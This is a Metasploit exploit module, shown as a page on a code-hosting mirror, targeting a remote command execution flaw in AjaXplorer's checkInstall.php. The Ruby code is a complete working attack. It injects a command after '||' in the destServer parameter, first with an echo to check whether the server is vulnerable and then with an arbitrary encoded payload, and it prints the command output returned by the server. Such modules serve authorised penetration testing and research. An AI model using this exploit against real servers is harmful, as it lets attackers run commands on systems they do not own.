CoCalc -- ajaxplorer_checkinstall

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
¹⁹⁹³⁴ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'AjaXplorer checkInstall.php Remote Command Execution',
16
        'Description' => %q{
17
          This module exploits an arbitrary command execution vulnerability in the
18
          AjaXplorer 'checkInstall.php' script. All versions of AjaXplorer prior to
19
          2.6 are vulnerable.
20
        },
21
        'Author' => [
22
          'Julien Cayssol', # Credited according to SecurityFocus
23
          'David Maciejak',  # Metasploit module
24
          'sinn3r'           # Final touch on the Metasploit module
25
        ],
26
        'License' => MSF_LICENSE,
27
        'References' => [
28
          [ 'OSVDB', '63552' ],
29
          [ 'BID', '39334' ]
30
        ],
31
        'Privileged' => false,
32
        'Payload' => {
33
          'DisableNops' => true,
34
          'Space' => 512,
35
          'Compat' =>
36
                        {
37
                          'ConnectionType' => 'find',
38
                          'PayloadType' => 'cmd',
39
                          'RequiredCmd' => 'generic perl ruby python telnet'
40
                        }
41
        },
42
        'Platform' => %w{bsd linux osx unix win},
43
        'Arch' => ARCH_CMD,
44
        'Targets' => [[ 'AjaXplorer 2.5.5 or older', {}]],
45
        'DisclosureDate' => '2010-04-04',
46
        'DefaultTarget' => 0,
47
        'Notes' => {
48
          'Reliability' => UNKNOWN_RELIABILITY,
49
          'Stability' => UNKNOWN_STABILITY,
50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
        }
52
      )
53
    )
54

55
    register_options(
56
      [
57
        OptString.new('TARGETURI', [true, 'The base path to AjaXplorer', '/AjaXplorer-2.5.5/'])
58
      ]
59
    )
60
  end
61

62
  def check
63
    uri = target_uri.path
64
    uri << '/' if uri[-1, 1] != '/'
65
    clue = Rex::Text::rand_text_alpha(rand(5) + 5)
66

67
    res = send_request_cgi({
68
      'method' => 'GET',
69
      'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),
70
      'vars_get' => {
71
        'destServer' => "||echo #{clue}"
72
      }
73
    })
74

75
    # If the server doesn't return the default redirection, probably something is wrong
76
    if res and res.code == 200 and res.body =~ /#{clue}/
77
      return Exploit::CheckCode::Vulnerable
78
    end
79

80
    return Exploit::CheckCode::Safe
81
  end
82

83
  def exploit
84
    peer = "#{rhost}:#{rport}"
85
    uri = target_uri.path
86

87
    # Trigger the command execution bug
88
    res = send_request_cgi({
89
      'method' => 'GET',
90
      'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),
91
      'vars_get' =>
92
        {
93
          'destServer' => "||#{payload.encoded}"
94
        }
95
    })
96

97
    if res
98
      print_status("The server returned: #{res.code} #{res.message}")
99
      m = res.body.scan(/Received output:\s\[([^\]]+)\]/).flatten[0] || ''
100

101
      if m.empty?
102
        print_error("This server may not be vulnerable")
103
      else
104
        print_status("Command output from the server:")
105
        print_line(m)
106
      end
107
    end
108
  end
109
end
110

111
=begin
112
Repo:
113
http://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/2.6/
114
=end
115

116
Product

Resources

Company
